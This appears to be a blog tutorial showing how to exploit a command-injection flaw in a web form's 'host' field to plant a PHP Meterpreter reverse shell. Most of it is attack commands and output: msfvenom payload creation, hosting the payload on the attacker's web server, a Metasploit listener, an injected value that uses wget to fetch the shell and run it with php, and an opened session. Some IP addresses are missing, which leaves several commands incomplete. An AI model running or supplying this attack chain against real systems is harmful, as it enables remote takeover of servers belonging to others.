Metasploit PHP reverse shell reference

Create shell with msfvenom

Let’s exploit this vulnerability to download a PHP reverse shell. But first create the shell with msfvenom:

root@bt:~# msfvenom -p php/meterpreter/reverse_tcp -f raw lhost= lport=4050 > /var/www/shell.txt
root@bt:~# head /var/www/shell.txt

# The payload handler overwrites this with the correct LHOST before sending
# it to the victim.
$ip = '';
$port = 4050;
$ipf = AF_INET;

if (FALSE !== strpos($ip, ":")) {

As you can see, the first line is commented out. Let’s uncomment it:

root@bt:~# sed -i 's/#<?php/<?php/' /var/www/shell.txt

Start web server on attacker’s machine

Although it would be possible to host our PHP shell on a third party, it’s convenient in our tutorial to host it from the attacker’s machine directly. Let’s start our web server:

root@bt:~# service apache2 start
 * Starting web server apache2              [ OK ]

Start listening on port 4050 from attacker’s machine

From BT5, let’s open our listener:

root@bt:~# msfconsole
msf > use multi/handler
msf  exploit(handler) > set payload php/meterpreter/reverse_tcp
msf  exploit(handler) > set lhost
msf  exploit(handler) > set lport 4050
msf  exploit(handler) > exploit

[*] Started reverse handler on 
[*] Starting the payload handler...

Download shell from the vulnerable host

Let’s exploit the vulnerability and download our shell from the attacker’s web server. Enter following command in the “host” field:

;wget -O /tmp/shell.php;php -f /tmp/shell.php

The above command will download shell.txt as shell.php in the /tmp directory and execute the php shell (php -f /tmp/shell.php)

Test the reverse shell

Now we have a meterpreter:

[*] Sending stage (38791 bytes) to
[*] Meterpreter session 1 opened ( -> at 2012-05-05 21:02:34 -0400

meterpreter > sysinfo
Computer    : snort
OS          : Linux snort 2.6.32-5-686 #1 SMP Mon Jan 16 16:04:25 UTC 2012 i686
Meterpreter : php/php
meterpreter > shell
Process 3845 created.
Channel 0 created.
eth0      Link encap:Ethernet  HWaddr 00:0c:29:97:32:0f  
          inet addr:  Bcast:  Mask:
          inet6 addr: fe80::20c:29ff:fe97:320f/64 Scope:Link
          RX packets:530 errors:0 dropped:0 overruns:0 frame:0
          TX packets:285 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:62923 (61.4 KiB)  TX bytes:31150 (30.4 KiB)
          Interrupt:19 Base address:0x2000



Author: SK,Seo

Me! Name: SK Seo

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s